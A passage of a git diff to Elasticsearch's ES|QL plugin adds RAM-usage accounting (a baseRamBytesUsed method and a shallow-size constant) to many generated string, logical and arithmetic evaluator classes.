     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef valScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java
index 18c4087b23cb2..953a4b76f5e1a 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/RightEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.String;
 import java.util.function.Function;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.apache.lucene.util.UnicodeUtil;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -27,6 +28,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class RightEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RightEvaluator.class);
+
   private final Source source;
 
   private final BytesRef out;
@@ -69,6 +72,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += length.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock lengthBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java
index 80167de794eec..f6e3bfb55c22d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SpaceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import java.util.function.Function;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.IntBlock;
@@ -25,6 +26,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpaceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpaceEvaluator.class);
+
   private final Source source;
 
   private final BreakingBytesRefBuilder scratch;
@@ -54,6 +57,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += number.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, IntBlock numberBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java
index 512222880b630..09e8fd103a417 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitSingleByteEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.String;
 import java.util.function.Function;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SplitSingleByteEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SplitSingleByteEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -56,6 +59,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java
index d5bc8e7dcfd6d..2ba6135721ff0 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SplitVariableEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.String;
 import java.util.function.Function;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SplitVariableEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SplitVariableEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -62,6 +65,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += delim.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock delimBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java
index 347bd8c0747f6..383e86854b5bf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -25,6 +26,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StartsWithEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StartsWithEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -60,6 +63,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += prefix.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock prefixBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java
index 4a754daae9453..5adf5f64a2166 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -25,6 +26,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SubstringEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubstringEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -70,6 +73,15 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += start.baseRamBytesUsed();
+    baseRamBytesUsed += length.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock startBlock,
       IntBlock lengthBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java
index f9d168e21548c..6fa5a9fcd5bf8 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/SubstringNoLengthEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -25,6 +26,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SubstringNoLengthEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubstringNoLengthEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator str;
@@ -60,6 +63,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += str.baseRamBytesUsed();
+    baseRamBytesUsed += start.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock strBlock, IntBlock startBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef strScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java
index b756fd69302e5..07d45bac1573b 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/TrimEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class TrimEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(TrimEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator val;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += val.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BytesRefBlock eval(int positionCount, BytesRefBlock valBlock) {
     try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) {
       BytesRef valScratch = new BytesRef();
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java
index 48a18bca990e7..df72c41ddabbf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/logical/NotEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class NotEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BooleanBlock vBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java
index a484dd87d0829..dbb2f54cd3e41 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDateNanosEvaluator.java
@@ -10,6 +10,7 @@
 import java.lang.String;
 import java.time.DateTimeException;
 import java.time.temporal.TemporalAmount;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -25,6 +26,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddDateNanosEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDateNanosEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator dateNanos;
@@ -54,6 +57,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += dateNanos.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock dateNanosBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java
index 2493924276af1..b61531526fa70 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDatetimesEvaluator.java
@@ -10,6 +10,7 @@
 import java.lang.String;
 import java.time.DateTimeException;
 import java.time.temporal.TemporalAmount;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -25,6 +26,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddDatetimesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDatetimesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator datetime;
@@ -54,6 +57,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += datetime.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock datetimeBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java
index cd052b38c7791..5f0600f8da2dc 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddDoublesEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddDoublesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddDoublesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java
index 680b70089b105..65d507bee4ce3 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddIntsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddIntsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddIntsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java
index b309702ccae6a..3c64881c4e922 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java
index 9267d93104541..0d7988969f9c1 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/AddUnsignedLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class AddUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddUnsignedLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java
index e8d2d440dc475..eec600defcd3b 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivDoublesEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class DivDoublesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivDoublesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java
index c86acaaf8c05b..d76c7576cc5e5 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivIntsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class DivIntsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivIntsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) {
